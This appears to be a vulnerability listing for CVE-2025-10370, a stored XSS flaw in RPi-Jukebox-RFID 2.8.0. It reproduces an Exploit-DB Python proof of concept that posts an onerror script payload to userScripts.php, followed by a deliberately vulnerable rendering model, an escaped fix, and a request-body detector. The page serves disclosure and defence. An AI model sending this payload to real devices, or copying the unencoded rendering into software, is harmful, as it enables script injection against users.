| Title | Published | Family |
|---|---|---|
| CVE-2025-10370 | 13 Sep 2025 19:46 | circl |
| RPi-Jukebox-RFID code injection vulnerability | 13 Sep 2025 00:00 | cnnvd |
| CVE-2025-10370 | 13 Sep 2025 17:02 | cve |
| CVE-2025-10370 MiczFlor RPi-Jukebox-RFID userScripts.php cross site scripting | 13 Sep 2025 17:02 | cvelist |
| RPi-Jukebox-RFID 2.8.0 - Stored Cross-Site Scripting (XSS) | 2 Feb 2026 00:00 | exploitdb |
| EUVD-2025-29096 | 3 Oct 2025 20:07 | euvd |
| CVE-2025-10370 | 13 Sep 2025 17:15 | nvd |
| PT-2025-37389 | 13 Sep 2025 00:00 | ptsecurity |
| CVE-2025-10370 | 15 Sep 2025 18:07 | redhatcve |
| CVE-2025-10370 MiczFlor RPi-Jukebox-RFID userScripts.php cross site scripting | 13 Sep 2025 17:02 | vulnrichment |
```python
# Exploit Title: RPi-Jukebox-RFID 2.8.0 - Stored XSS (CVE-2025-10370)
# Date: 2025-09-25
# Exploit Author: Beatriz Fresno Naumova
# Vendor Homepage: https://github.com/MiczFlor/RPi-Jukebox-RFID
# Software Link: https://github.com/MiczFlor/RPi-Jukebox-RFID/releases/tag/v2.8.0
# Version: 2.8.0
# Tested on: Raspberry Pi OS with RPi-Jukebox-RFID v2.8.0
# CVE: CVE-2025-10370
#
# Description:
# This PoC demonstrates a Cross-Site Scripting (XSS) vulnerability in the userScripts.php page.
# The vulnerable parameter "customScript" does not sanitize input correctly, allowing injection
# of arbitrary JavaScript payloads.

import requests

# Change this to the actual IP or hostname of the target device
TARGET = "http://YOUR-TARGET-IP/phoniebox/htdocs/userScripts.php"

# The XSS payload
PAYLOAD = '"><img src=x onerror=alert("XSS - CVE-2025-10370")>'

# HTTP headers
headers = {
    "User-Agent": "Mozilla/5.0",
    "Content-Type": "application/x-www-form-urlencoded",
    "Referer": TARGET,
}

# POST data with the malicious payload
data = {
    "customScript": PAYLOAD
}


def send_exploit():
    print(f"[+] Sending XSS payload to {TARGET}")
    try:
        r = requests.post(TARGET, headers=headers, data=data, timeout=5)
        print(f"[+] Payload sent. Status code: {r.status_code}")
        print("[*] If the target is vulnerable, the payload will execute when the page is rendered.")
    except Exception as e:
        print(f"[-] Exploit failed: {e}")


if __name__ == "__main__":
    send_exploit()
```
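The PoC header names the defect class but not the fix: the stored `customScript` value is written back into the page without output encoding. The Python below is an added example, not part of the Exploit-DB entry and not the RPi-Jukebox-RFID code; it models that rendering so the defect and its remediation can be checked side by side, and adds a small request-body check a defender could run over form-encoded POST bodies. The assumption that `userScripts.php` reflects the value into an HTML attribute is a constructed stand-in (the page does not show the PHP), as are the sample POST bodies; only the payload string comes from the PoC.

```python
import html
import re
from urllib.parse import urlencode, parse_qs

# Payload from the PoC above; everything else in this file is a constructed model.
PAYLOAD = '"><img src=x onerror=alert("XSS - CVE-2025-10370")>'

# Matches the start of an HTML element; used to count elements in rendered markup.
TAG_RE = re.compile(r"<\s*[a-zA-Z]")


def render_vulnerable(custom_script: str) -> str:
    """Model of the defect class: the stored value is interpolated into an attribute
    with no output encoding (assumption: attribute context, not the project's code)."""
    return f'<input type="text" name="customScript" value="{custom_script}">'


def render_fixed(custom_script: str) -> str:
    """Hardened form: encode for the HTML attribute context before interpolation.
    quote=True escapes both " and ' in addition to &, < and >."""
    safe = html.escape(custom_script, quote=True)
    return f'<input type="text" name="customScript" value="{safe}">'


def count_tags(markup: str) -> int:
    """Number of element starts in the rendered fragment."""
    return len(TAG_RE.findall(markup))


def attribute_breakout(markup: str) -> bool:
    """True when the fragment contains more than the single <input> we emitted,
    i.e. the value closed the attribute and introduced a new element."""
    return count_tags(markup) > 1


def flag_post_body(body: str) -> bool:
    """Defender-side check over an application/x-www-form-urlencoded body:
    flag a customScript field that carries HTML markup. This is a coarse
    detection aid for logging or WAF rules, not a substitute for the output
    encoding in render_fixed()."""
    fields = parse_qs(body, keep_blank_values=True)
    return any(TAG_RE.search(value) for value in fields.get("customScript", []))


# Constructed sample bodies in the shape requests.post(data=...) would send.
SAMPLE_BODY = urlencode({"customScript": PAYLOAD})
BENIGN_BODY = urlencode({"customScript": "echo hello"})


if __name__ == "__main__":
    print("vulnerable:", render_vulnerable(PAYLOAD))
    print("  breakout:", attribute_breakout(render_vulnerable(PAYLOAD)))
    print("fixed:     ", render_fixed(PAYLOAD))
    print("  breakout:", attribute_breakout(render_fixed(PAYLOAD)))
    print("flagged sample body:", flag_post_body(SAMPLE_BODY))
    print("flagged benign body:", flag_post_body(BENIGN_BODY))
```

In the PHP the project actually uses, the equivalent of `render_fixed` is wrapping the echoed value in `htmlspecialchars($value, ENT_QUOTES)`; the encoding has to match the context the value lands in (attribute here), which is why quotes are escaped as well as angle brackets.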